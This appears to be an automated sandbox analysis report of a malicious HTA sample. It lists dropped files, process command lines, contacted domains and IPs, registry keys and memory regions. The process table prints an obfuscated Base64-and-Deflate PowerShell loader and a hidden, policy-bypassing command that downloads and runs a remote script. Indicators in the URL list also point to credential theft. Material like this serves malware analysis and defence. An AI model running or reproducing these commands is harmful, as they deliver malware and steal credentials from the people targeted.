Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
new-riii-1-b.pub.hta
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\UAGVQ199I7H3ZT4G1PSFXCX6W.exe
|
HTML document, Unicode text, UTF-8 text, with very long lines (986)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfcwwmgq.gat.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gscs4evv.rkw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyfx1lwm.1uo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlyzcixi.zsd.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\new-riii-1-b.pub.hta"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc $ O e A 6 Z G 9 7 Z D b 7 R h i l m F 4 9 Z V 2 B n n u C v b 6 X 9 r W d 1 B 6 E b 7 m 9 x 9 y o v T d s k 7 x U K N l M 0 I X O O 5 Y f T T s f N C B B 1 U F T v Z 8 d x k R C k 2 B g b F q W J F g d 5 i Z 3 V P V 5 v C 2 D 6 Z 7 2 6 e t 3 L 3 h D B u T R E x f 9 0 f f b W r R 5 U 8 V U T U h i W P Y e y R 8 q z t S 4 R Q G J D W 2 s L i q v g l S G q I 1 5 v N K V C X y Q f S v q O n a 0 D V k b a 3 B q T 2 H s 9 0 K O u 3 X 4 G C 6 R z b u W f Y C A G X H U P M g o C s R F o y j u f w T l b v m 7 C w 3 c h Q O o s u M a t c 5 C w k Y c d Z a c J 7 g I P l W t o S k t D 9 6 e M c n X h y Z 5 y y D E r 9 j Q j q J j 8 N e 4 f x G i z N y F A E e M Z W 0 3 S Z Z g v Q Y j m r t U W L 7 k 7 Y d p 4 L l N o x 1 C 8 Q b f O Y o R v W r x S K A Z 3 i i Z r M x L d g x Y b a b G 1 j k 2 w w V j E a y N l B 4 y 3 y Y 2 e O L E D R B K W U N f d n l R N 3 E H 1 a h b W 5 P J y X L Z l Y o I s f F g C f n i 5 g k G 1 9 v q C m L E i u E L f m x s F K o 7 L i c d e 8 A 5 7 V j y S F c o l J 9 r d N O P J f V M 9 z o A Y q u t Z 6 q q D Z W r 2 t A z n J U a H a J d W Z y Y f m z J J 4 5 6 Z r g p s D s C v I w s c F A m 6 V H a T h 7 u L Z o n c l B T Y m R Q p X Y n D U C b o m V R L b t S 9 w n f V J Q N I J g m Y G p y O F O Z 6 f P E M B S 9 o g b H H r w f q S R H 6 N b a 8 f F k R g G y e v 0 x q 1 1 U O h V 4 h R 6 X 1 g 3 9 k S 7 A T Y D H h e 3 t H 6 B d r T C H c 6 N 2 a d k c u x h t e o R e 6 a f z 5 U D n b g N Q K 9 r B K 2 e u f 7 r r b X 5 z D p r 8 b T D N M Y a Z z r G 2 3 7 s n z Z N H N U s H b t x T u 0 j 1 Y I f b Z O r s 9 l J q N c y V x k i 2 T H T x B 5 Z 7 J A M w y 9 B l 5 Q c W N A k z 4 d Q b p w e h 3 w Q Z F R 0 d K G o J n   =   $ f A L s e  
 $ 5 0 s D 4 N s 3 o M 0 r P E 3 4 W J o D B 5 t x g K N d 2 p p m 8 U 3 V D 6 g n t n u U a B h R K I R 6 C Y M t m 9 c A P V y e l K D 2 I C A d 6 d 4 E s Q E E 7 A 0 z i w Y 9 k r 0 S N 4 h 1 v y x Q Y Q i G 0 S c N w Q L r N Q t P 2 S C s v t w k c E 1 i 4 P R M r G G g f y 1 3 z U f 5 d 3 f z O m M M O K Z B K K d a S 0 U X 9 V X X T 3 t c 0 O T C S J J l 8 Z t X i v S u B 4 Q 0 4 C W Q T T 5 6 A j R 2 M w W o U N Z n c J J n Y I N 8 J Q O 7 K h q 2 Z 7 7 0 c 6 N z H c j n s 5 C 4 V Q 0 a r c p 5 Z C O c K h O x y A C T E K p e U l L s Q b O F 1 V 0 B r s 6 Q o e g e Z Y o W I b V w M I J C x K O n 6 3 i N m E 6 a M n G N 0 U 7 3 O x H P F G S c m Z e y a j I l w F l W D m y 0 j F B Z h y d E s h T w z e i M 7 c 4 k e o S Z 8 u 8 u k j T u 0 v P o H S z 1 d e Y 3 U N m m b s w j i O P n j m 0 b 6 2 A 1 Y X H t R q Z 9 B N y z j P a i y 4 k 8 H g 0 Q E K 5 u e n e a M N X j 6 w w L 2 i H 3 v 3 o t m R V r x t H z e M 1 6 W r S 5 G d T N x x a r R v z g i W Y 7 c m f F c R u 1 y B 6 1 P 6 3 y H I R l E q P J F Z 3 f 9 z h w Y g G 3 b B H q 4 G j r C k n R p O k m K N 1 P V w S P g C O n p K x X L F J s I q J o T L K a s C 1 h I u N J o a h P Q a M 7 M T S t z 7 L z I Z 4 G o f P E r U u Q 8 o 2 W e R n C F 6 S G P 6 6 v m 9 N t r F s z 7 S 0 D J F q q z E q x Z w h S C K o B n i g 9 3 3 E A B Z p i Y v a 9 e w B k 8 g K X E E m T o 9 k z Y g c i F n D B d Z L n l X k L J 9 b 1 u S R G N w U t L w w 5 R d x w 3 a v Q g p B M 7 2 u i M r b Y e F N w N L P U E m h u 0 N l Z 4 k X j 5 E p 7 h 0 u d r t 1 D g L x m S b h x 4 b 5 a h 1 V k C 6 S g i 9 a 6 p i J Y H f S G H r 8 2 V O n f 5 L t f E T A i 1 V 6 1 5 j X o x O J 5 L T o N B E U 6 F S 6 r K G C a d y v b 2 z g H 4 B q s 0 K 5 X y j G w I P 0 a f h 2 L F g 1 3 0 q k E 4 4 a T e 4 B t V n C t i d f j t t 5 i P p X A 9 x g 1 a S N u 1 W S g r g 1 K V G R 8 q t 9 R X c E 9 u g j l a A 3 C h 7 P l h b W e B W x A T C I 9 k l X 4 q c F x 5 4 g U z N e k V J v w z o 3 Q u 5 X s 3 b j G O 1 b w E H d o   =   $ t R u E  
 $ K l w Z 2 v X 4 C H 9 e l k 6 V 9 o 7 Y R B L E y 7 q h N E s 1 3 3 s s R z I d o O 7 D W 1 x 4 n R S C m e 8 h e R Z f c h T 3 L k B W h 9 D K S S n e l j x i n N C o 5 m p i z r C s G n V e j s 4 h Z E 3 L P P o S O g u H K O r h I w 0 Q 9 E n q f C e y M h S u p g z u 1 3 N c 7 4 X N 9 I 5 R 5 F f V 5 Q 5 F n T 8 b R m a 5 k s 5 O 9 f f w h U M 6 9 j b A Q P Q m s J h Z z K J x f Z 5 Y Y 3 W J P P w m 4 V S 4 p P q G 2 S X t 7 M R H a p u K E X w y W 5 8 N H 6 i e 7 N D 1 y N K j E   =   $ N u L l  
 $ M j 6 k z 2 f m g z O L 6 K R 1 n G R P L R 7 6 t 0 G C 4 N b b f T Z D C 8 l s b S S 9 r U 6 o v i y M Y a y d a u z 6 0 a f b v L z Z e U J d p a a u s 7 C 1 x n Q P V l B 8 5 B I G 5 d R 6 M y c t T o W k F Z E D 2 f R U n z M d N j 7 P T E 1 5 g O 8 q M 9 f S j z g S L j C B s 0 A H E 3 W 5 m Q g G 6 G 9 J n D P D R s O 5 b y D 6 g v k Z p X Q W a r u K A m i g r M o a H b K x 5 8 u F 4 z 5 A k f 9 T O x w v E 0 z R 2 1 O u Z J J F k p j t 7 2 j E s 5 h Q K i P u r Z 5 8 h e 3 E H W U d S Z m j z U Q l c Y Q I N x f x y o a n 5 E 6 W e c j z l N r d A p P z K M o W Y z V r h J N V 8 2 R 6 f U r n G 6 9 4 j n X 4 I b s w D 4 K H u K 5 v S B n h i k l i I e W Y K x R l F 2 p Q f p T Q I 7 B a h i h a N o X i 0 h i t N D U K i B f T D t 3 P F c Y J f g h F t g x l 1 I u B b Q 3 h X u i F E x p T P w z D S 2 r p b 6 q n R l k q M N c O v P X z x t x c k y 7 f 0 L t U n n v x 4 O R W Z R v 0 x B A v 8 e 6 v K n f p J R 4 f x p g j T F R x G g 6 I 3 6 K K I 8 s H 3 r B 7 z f W 7 6 O T B V 7 Y n 3 O p 3 C J M M t m z H K b 2 2 m 8 n h w 4 f O m V c g x m X 6 e U R R f 2 p m C h s J i 7 B 5 w T h 2 n 3 p r 6 r o h J O O P 6 k 6 t N l L 8 z F T r V l i Z D u C i 1 E P O S 3 s c 3 1 m T O 0 X 5 t R p P N N W c t F D m R 0 w h Y v y K o h D L x v X d h e 3 4 T K Z y t C u x J z x a i 1 r 0 f l S q k s g q Q o q Q 1 M F L I L Q y t 4 z W T V o k M s O f B l r J n N 5 y g u 4 U v a a S E i 2 N 2 Z Q i V 0 d u y D F Q 8 3 b G 9 W A L K r c 9 S U A M g A c v w P U f T K 6 1 Y c x t s v T x g X I 5 y k y e y a I U l i a W j T A r 4 U n h X Z V C z A w x A t E x 3 t C N R Z p P t k S 0 O c m g k G I Q J 1 L n M C G k O E 3 K v h 9 x a 7 r 3 s P 3 K U y P b 2 V X r 3 d M l w m h H s E l e f 9 I Y L d b O 3 X y S c X b c D M a j a t e t w v 6 j D e K V 3 U O h z U d K W p 5 0 s I t L W q p d e d u L J N l P B H n B a Y U B 8 T K d S R u g A H P f w L A O y a j A j   = " D e f l a "   +   " t e S t r e a m " ; $ u t 0 T k Z V H b 7 B 3 7 F I x F R F R C i X B y i i s e 1 b G f R Q V y I 6 8 S g s X T h N 5 L k 0 t T q a 6 A k q n I U 0 H p v s A f Y 0 p x o B 0 p b m A V k P k B e 2 N f c v b z J R g p t R g o O q O G x u q h F i 2 v 7 I P X x L e u E i g V i u Q u S r o 7 s n P Q 9 6 S F D f w h e U T C 6 6 z Y D T H 7 z Q E 6 5 N Z R Z a i 2 G 3 f v V X v d w f c p V Z z u t 9 5 K U i D 2 H H i 0 e e 0 v 0 O b J D J 2 1 h x Q V a H q H N m W y S 2 7 K i v 3 r Y E 4 f E r U p p q a 2 b u t c q S 6 k u e F y N Z 8 T i N r m w T F v 2 i U D f t M j 5 s p y g 3 4 X f 8 j k b m z Y d 9 U 6 B g q 4 k 0 W A G r P k J N x P 6 O 1 6 o A i R R Q a k x d Q o 7 l G l k Q B E 9 F N 8 s i z N O W U T 3 t d u J H h X 5 d J k D I M T 3 Z k X f j R g 7 1 N f 1 t m k x g 2 C 2 5 m R R M A g X p l I K f 8 e v b 2 X v R L I Z F e g r j y q p E 7 p 2 t m r 5 B s U H 8 M r k d Z K N 1 t g D d C D Q X V N O C i Z 4 r Z T e U r t J x z P 8 g X t i K v D 9 G e B M C F 3 d v Y a 3 o J W S g D t T D T H G T z p b K h c j q U k I q f 3 1 J W b v U z U q S J c R u F s G Y U L N E B X J Y 2 u m t K n n Q p X 8 P 2 J o l E x F 7 r l L 5 I 4 l q B D o e S 8 c A a s J J 9 y a X F I O 2 9 P   =   " C o m p r e "   +   " s s i o n " ;   $ K Q k s q 7 X o U s W q 0 D a c U b 3 l B H o R B Z y q v g e A K P j P q I j J V Q f 3 k 3 z L Y W Z M g b 9 m m X J W 3 f f v A t i z x O e m s I 5 r i R t m 0 U d V Z j R i 9 K P 1 o y H k 4 j 0 T e w R 5 Z v W 9 M 6 M i 5 d H L x X t P h l m x Q U Z 9 q O d C V E B g b M B r j C H o u 2 4 S X N B i Y D f B f u G 9 d R P m e T W 1 8 R X y I x y W G L j W K r d J V C 6 i S r W B E m p 1 6 X 8 H f p T c 3 C d V R U m q 8 P t q a A G N M k L l e P o R v X h O e b H x D o q I s u r h c u F 4 e N J b o S M c J Y r 8 I z f f B K 3 4 y 8 E a V x g G x 0 c C A P e V L C 9 j D 8 3 e j R k 1 S A 2 G P l F o y s j y U P q p p g K s O V 0 E S b d 3 n p x 4 W C G D 9 3 L n Y s p 9 A P c c A v E t z T M D O N b z x c f J K v Q x C D j F D j e A j F 4 z 8 8 y 5 b E x   = " S t r e a "   +   " m R e a d e r " ;   . ( " i " + " e x " )   $ ( N e w - O b j e c t   I O . $ K q K S Q 7 X o u s W Q 0 d A c u b 3 l B h o r B Z Y q v g e A k P J p q I j J V Q F 3 k 3 z L y w Z m g b 9 m m X j w 3 F f V A t I Z X O E m S I 5 r I r t m 0 U D V Z j r I 9 k P 1 o Y H k 4 J 0 T E w R 5 Z v W 9 m 6 M i 5 d h L X X t P H l m x Q u z 9 q o d c v e B g B M b r j c h o u 2 4 s x N B i Y d F B F U G 9 D R P m e T W 1 8 r x Y i x Y W g L J W K R D j V C 6 I s r W B e M P 1 6 X 8 H f P T C 3 c d V r u m Q 8 p t q A A G n m k l l E p O R V x H O e b H x D O q I S u r h c u f 4 E N j B O s m c j y r 8 i z F f B K 3 4 Y 8 E A V x G g x 0 C c A P E v l C 9 J d 8 3 E j r k 1 S A 2 G P L F O y s J Y u p Q P p g k S O V 0 E s b D 3 N P x 4 w c G D 9 3 L N Y s P 9 A p c c A v E T z T M d o n B Z X C f j k V Q X c D j F D J e a j F 4 Z 8 8 Y 5 B E X   ( $ ( N e w - O b j e c t   I o . $ U T 0 T K Z V H B 7 b 3 7 F I x F R F R c I X B Y i i S E 1 B g f r Q V Y I 6 8 S g s x t H n 5 l k 0 T t q a 6 a K Q n i u 0 h p v s a f Y 0 p x o B 0 P b M a V k p K b E 2 N F c V B Z j R G p t r g O o Q O G X U Q h F I 2 v 7 I p x X L e u e I G v i U Q U s r o 7 S n P q 9 6 s F d F W H e U t C 6 6 Z Y d t h 7 Z q e 6 5 N z R z A I 2 G 3 f V V x v d w F c p V z z U T 9 5 K U i d 2 H H I 0 e e 0 v 0 O b j D J 2 1 h x Q v A h Q H n m W Y s 2 7 K i V 3 r Y e 4 F E r U P p q A 2 B U T C q s 6 K U E F Y N Z 8 T i n R m W T f v 2 i u D F t m j 5 s P y G 3 4 X f 8 J K b M Z y d 9 u 6 b G Q 4 K 0 W A g R P k j N x p 6 O 1 6 O a i R r Q a k x D q o 7 l G l k q b E 9 f n 8 s I Z n O W U t 3 T d u j H h X 5 d j K D i M T 3 Z K X F j r g 7 1 N f 1 T M k X G 2 c 2 5 M R R M a g x p L I K f 8 e V B 2 x v r L i Z F E G r j Y q p e 7 p 2 T m r 5 B s U H 8 M R K D z k n 1 T g d D c d Q x V n O c i Z 4 R Z t e U R T j x Z P 8 g X t I k v d 9 G E b m C f 3 d v y a 3 O J W S g d T t d t h g t Z P b k h c j Q u k I q f 3 1 j W b V u Z U Q S j c R U f S G y U L n e b x J y 2 u M T K N n Q P X 8 p 2 J O L e X F 7 r L L 5 i 4 L Q B d o E s 8 c A a s j j 9 Y a X f i O 2 9 P . $ m j 6 k z 2 f M g Z o L 6 k r 1 n G r P l r 7 6 t 0 g C 4 n B B F t z d c 8 L S B S S 9 r U 6 o V I y M Y a Y d a U Z 6 0 a f B v L Z Z e u J D p A A u s 7 c 1 x n q P V l B 8 5 B i G 5 d R 6 M Y C T t O W K f Z E D 2 F R u n z m d n J 7 p t e 1 5 g o 8 Q M 9 F s J Z G s L j c B S 0 A H e 3 w 5 m Q g G 6 g 9 J n d p D R s O 5 B Y D 6 G V k Z P X q W A R u K A M i G R M o A H b k X 5 8 U F 4 Z 5 A K F 9 T O x W V e 0 Z R 2 1 O u Z J J F k p J T 7 2 j e s 5 H q k i P U R Z 5 8 h e 3 e H W u d S z m j z U Q l c y q i n X f x y O A N 5 E 6 W e C j z l N r D A p p z K M o w y Z V r h J N v 8 2 R 6 f u R n G 6 9 4 j N x 4 I b s W d 4 k h u K 5 V S B n h i k l I i e W y K X R l f 2 p Q f p T Q i 7 B A H I h a n o x I 0 h I T n d U k I B f t D T 3 P F C Y J f G H f T G X L 1 i u B B q 3 H X u I f e x P T P w Z D s 2 r P B 6 q N r L k q m N c O v P x Z x t x C k Y 7 F 0 l T U N N V x 4 O R w z r V 0 X B A V 8 E 6 V k n F p J r 4 f x P g J t f r X G G 6 i 3 6 K k I 8 s h 3 R b 7 Z F W 7 6 o t b V 7 Y N 3 o P 3 C j m M t M z h K b 2 2 M 8 n H w 4 f o M v c G x M X 6 E U R R f 2 p M C h S j I 7 B 5 W t h 2 n 3 P r 6 R o h J o O P 6 K 6 T N L L 8 z f t R V l i z D U C I 1 e p o s 3 S c 3 1 m T o 0 X 5 t r P p N N W c t F d M r 0 W H y V y K O h d l X V X d H e 3 4 t k Z Y T C U x J z X a I 1 R 0 F L S q k S g Q Q O Q q 1 m f l I L q y t 4 z W T V O K M s O F b L R J N N 5 y g U 4 u V A A S e i 2 n 2 z q i V 0 D U y D f Q 8 3 B G 9 w A L K R C 9 s U A M G a C v W P U f T k 6 1 y C X t s v t X g x I 5 Y k Y E y A I u l i A w J t a r 4 U N H X z v C Z A w x a T e x 3 t c N R z p P t k s 0 O c M g k G i q J 1 l N M C G k O e 3 k v H 9 X a 7 r 3 S P 3 k U y p b 2 v x R 3 D m l w m h h s e L E f 9 i Y L d B O 3 X Y s c X b C D m a j a t e t w v 6 j D e K V 3 u o H Z U d k W P 5 0 S I t l W Q p d e d U L j n l p B H N B A y u B 8 t K D S R u G a H P F W l A O y a J a j   ( $ ( N e w - O b j e c t   I O . M e M O R y s T R E A M ( , $ ( [ C o n v e r t ] : : ( " F r o m B "   + " a s e 6 "   +   " 4 S t r i n g " ) ( " N Y + x b o M w F E V / 5 Y k l M N g k a l N V 2 S I 6 Z K j S S A w s D D H 4 E V w Z P 8 t + w e H v S 1 p 1 v H c 4 9 9 y a V W B x C d R j j J B V h 7 Y x T l O K b b 3 E h t L b 6 3 9 x o Y S h H t H a d t 7 J b e u f O T 6 z x A d m I I 7 h d p / Q 8 a e J D J l I M B q t 0 Y F A D 9 3 i 1 c o X j j y I i q Z J O Q 3 X z O A D 8 v y M S X x 1 3 9 g z r K O M k z w j y w a 7 y p q V V 8 g P S s 6 S 0 j U H 4 2 7 5 Z m T 2 8 V C W u J M D G U s z B r 4 H p 0 I w s 7 I y j u T L f f + + N y 9 z N 8 h Z D 5 u i u G a r 4 t + V m h e L c P q 1 + w E = " ) ) ) ) ,   [ i o . c O m p r E s s I o n . c o m P r E S S i O n m O D E ] : : ( " D e "   + " c o m p r e s s " ) ) ) ,   [ t E x t . E n c o D i n g ] : : A S C I I ) ) . R e a d T o E n d ( ) ; 
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
jarry-deatile.bond
|
|||
https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf
|
172.67.194.161
|
||
immolatechallen.bond
|
|||
idealizetreez.shop
|
|||
pain-temper.bond
|
|||
growthselec.bond
|
|||
https://idealizetreez.shop/api
|
104.21.64.1
|
||
stripedre-lot.bond
|
|||
jarry-fixxer.bond
|
|||
crookedfoshe.bond
|
|||
https://e1.foiloverturnarrival.shop
|
unknown
|
||
strivehelpeu.bond
|
|||
https://idealizetreez.shop:443/api.default-release/key4.dbPK
|
unknown
|
||
https://github.com/mgravell/protobuf-netJ
|
unknown
|
||
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
http://www.smartassembly.com/webservices/Reporting/UploadReport2
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://www.red-gate.com/products/dotnet-development/smartassembly/?utm_source=smartassemblyui&utm_me
|
unknown
|
||
http://www.smartassembly.com/webservices/Reporting/
|
unknown
|
||
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
|
unknown
|
||
http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL
|
unknown
|
||
https://klipgibob.shop/
|
unknown
|
||
https://github.com/mgravell/protobuf-neti
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://stackoverflow.com/q/11564914/23354;
|
unknown
|
||
https://klipgibob.shop/int_clp_8888.txt
|
172.67.212.45
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://e1.foilovMicrosoft.PowerShell.Utility.psd1
|
unknown
|
||
https://developers.cloudflare.com/r2/data-access/public-buckets/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://e1.foilovM
|
unknown
|
||
https://idealizetreez.shop/
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://sectigo.com/CPS0
|
unknown
|
||
https://stackoverflow.com/q/14436606/23354
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://idealizetreez.shop:443/api
|
unknown
|
||
https://f1.foiloverturnarrival.shop/riiw1.mp3
|
172.67.194.161
|
||
https://idealizetreez.shop/&
|
unknown
|
||
https://klipgibob.shop/R
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
|
unknown
|
||
https://github.com/mgravell/protobuf-net
|
unknown
|
||
https://klipgibob.shop/d
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://www.smartassembly.com/webservices/Reporting/UploadReport2v
|
unknown
|
||
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
|
unknown
|
||
https://stackoverflow.com/q/2152978/23354
|
unknown
|
||
https://www.cloudflare.com/favicon.ico
|
unknown
|
||
http://www.smartassembly.com/webservices/UploadReportLogin/
|
unknown
|
||
https://klipgibob.shop:443/int_clp_8888.txtt
|
unknown
|
||
https://idealizetreez.shop/apiP
|
unknown
|
There are 45 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
e1.foiloverturnarrival.shop
|
172.67.194.161
|
||
idealizetreez.shop
|
104.21.64.1
|
||
f1.foiloverturnarrival.shop
|
172.67.194.161
|
||
klipgibob.shop
|
172.67.212.45
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
104.21.64.1
|
idealizetreez.shop
|
United States
|
||
172.67.194.161
|
e1.foiloverturnarrival.shop
|
United States
|
||
172.67.212.45
|
klipgibob.shop
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
400000
|
remote allocation
|
page execute and read and write
|
||
668F000
|
trusted library allocation
|
page read and write
|
||
6898000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
4E23000
|
trusted library allocation
|
page execute and read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
336F000
|
heap
|
page read and write
|
||
EB59000
|
trusted library allocation
|
page read and write
|
||
AD13000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
AD9D000
|
heap
|
page read and write
|
||
502F000
|
stack
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
4F6E000
|
stack
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
8851000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
51D0000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
2F05000
|
heap
|
page read and write
|
||
7EF0000
|
trusted library allocation
|
page read and write
|
||
ABB3000
|
heap
|
page read and write
|
||
3334000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
ABB8000
|
heap
|
page read and write
|
||
A5B7000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
51A0000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
AD59000
|
heap
|
page read and write
|
||
79FE000
|
stack
|
page read and write
|
||
AC71000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
4D60000
|
trusted library allocation
|
page read and write
|
||
44FF000
|
stack
|
page read and write
|
||
88AE000
|
heap
|
page read and write
|
||
7B82000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
ABB6000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
EE10000
|
trusted library allocation
|
page read and write
|
||
3360000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
88EC000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
52A5000
|
trusted library allocation
|
page execute and read and write
|
||
754F000
|
stack
|
page read and write
|
||
7A4E000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
4ABE000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7B6B000
|
heap
|
page read and write
|
||
ABB4000
|
heap
|
page read and write
|
||
71F8000
|
trusted library allocation
|
page read and write
|
||
ABBB000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
AC6B000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
7F820000
|
trusted library allocation
|
page execute and read and write
|
||
6305000
|
heap
|
page read and write
|
||
EBB0000
|
trusted library section
|
page read and write
|
||
A70D000
|
heap
|
page read and write
|
||
352E000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
AE0E000
|
heap
|
page read and write
|
||
AD55000
|
heap
|
page read and write
|
||
878E000
|
stack
|
page read and write
|
||
5030000
|
heap
|
page execute and read and write
|
||
6310000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
AC57000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
7D5E000
|
stack
|
page read and write
|
||
7360000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
4E80000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
4E24000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
78CE000
|
stack
|
page read and write
|
||
89CE000
|
stack
|
page read and write
|
||
89E0000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
7672000
|
heap
|
page read and write
|
||
8510000
|
trusted library allocation
|
page read and write
|
||
37A0000
|
heap
|
page read and write
|
||
7ED0000
|
trusted library allocation
|
page read and write
|
||
5160000
|
heap
|
